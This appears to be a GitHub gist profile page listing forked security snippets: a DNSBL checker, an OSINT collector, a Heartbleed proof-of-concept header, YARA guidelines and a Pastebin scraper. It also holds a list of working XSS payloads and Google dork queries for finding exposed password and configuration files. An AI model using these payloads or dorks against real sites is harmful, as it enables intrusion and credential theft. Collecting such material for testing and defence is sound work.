Skip to content

Instantly share code, notes, and snippets.

View reanimat0r's full-sized avatar

Bart Black reanimat0r

26 followers · 50 following
View GitHub Profile
@reanimat0r
reanimat0r / dnsbl.php
Created October 28, 2019 20:17 — forked from tbreuss/dnsbl.php
IP Blacklist Check Script - This is a simple PHP script to lookup for blacklisted IP against multiple DNSBLs at once.
<?php // Simple PHP script to lookup for blacklisted IP against multiple DNSBLs at once. ?>
<html>
<head>
<title>DNSBL Lookup Tool - IP Blacklist Check Script</title>
</head>
<body>
<h2>IP Blacklist Check Script</h2>
<form action="" method="get">
<input type="text" value="" name="ip"/>
<input type="submit" value="LOOKUP"/>
@reanimat0r
reanimat0r / osint-collector-python27.py
Created October 25, 2019 20:55 — forked from taco-shellcode/osint-collector-python27.py
'''
Requirements:
sudo apt-get install python3
sudo apt-get install pip3
pip3 install python-twitter
pip3 install beautifulsoup4
'''
import os
import re
@reanimat0r
reanimat0r / hb-test.py
Created July 17, 2019 17:42 — forked from takeshixx/hb-test.py
OpenSSL heartbeat PoC with STARTTLS support.
#!/usr/bin/env python2
"""
Author: takeshix <[email protected]>
PoC code for CVE-2014-0160. Original PoC by Jared Stafford ([email protected]).
Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP.
"""
import sys,struct,socket
from argparse import ArgumentParser
@reanimat0r
reanimat0r / sshd.go
Created July 10, 2019 03:20 — forked from jpillora/sshd.go
Go SSH server complete example - Read more here https://blog.gopheracademy.com/go-and-ssh/
// A small SSH daemon providing bash sessions
//
// Server:
// cd my/new/dir/
// #generate server keypair
// ssh-keygen -t rsa
// go get -v .
// go run sshd.go
//
// Client:
@reanimat0r
reanimat0r / html2secvector.list
Created July 10, 2019 03:18 — forked from mylamour/html2secvector.list
>>> vectors()
<div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]</div><div id="5"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//["'`-->]]>]</div><div id="6"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//["'`-->]]>]</div><div id="7"><input onfocus=alert(7) autofocus>//["'`-->]]>]</div><div id="8"><input onblur=alert(8) autofocus><input autofocus>//["'`-->]]>]</div><div id="9"><a style="-o-link:'javascript:alert(9)';-o-link-source
@reanimat0r
reanimat0r / yara_performance_guidelines.md
Created July 10, 2019 03:15 — forked from Neo23x0/yara_performance_guidelines.md
YARA Performance Guidelines

YARA Performance Guidelines

When creating your rules for YARA keep in mind the following guidelines in order to get the best performance from them. This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.

  • Revision 1.2.1, February 2019, applies to all YARA versions higher than 3.3

Global Rules

Global rules are evaluated first. Only if they are satisfied non-global rules are evaluated. This may be useful if all samples exhibit the same characteristics. Use them combined with the "private" statement to suppress a match notification on the global rules.

@reanimat0r
reanimat0r / GoogleHackMasterList.txt
Created July 10, 2019 03:13 — forked from mylamour/GoogleHackMasterList.txt
The definitive super list for "Google Hacking".
admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www&#8221; domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
Duclassified" -site:duware.com "DUware All Rights reserved"
duclassmate" -site:duware.com
@reanimat0r
reanimat0r / start_fuzzing.md
Created July 10, 2019 03:07 — forked from mylamour/start_fuzzing.md
#Fuzzing#
@reanimat0r
reanimat0r / download.py
Created July 10, 2019 03:05 — forked from mylamour/download.py
[threatfeeds download] #python #threat feeds.io
import re, os, sys
import json
import logging
import hashlib
import requests
from functools import partial
from bs4 import BeautifulSoup
from concurrent.futures import ProcessPoolExecutor
from multiprocessing import Pool, TimeoutError
from urllib.parse import urlparse
@reanimat0r
reanimat0r / pastebinhunter.py
Created July 10, 2019 02:57 — forked from mylamour/pastebinhunter.py
Get Data from Pastebin use api
from gevent import monkey
monkey.patch_all()
from SMLoki import SMLoki
from bs4 import BeautifulSoup
from urllib.parse import urlparse
from uuid import uuid1
import signal as signal_module
import requests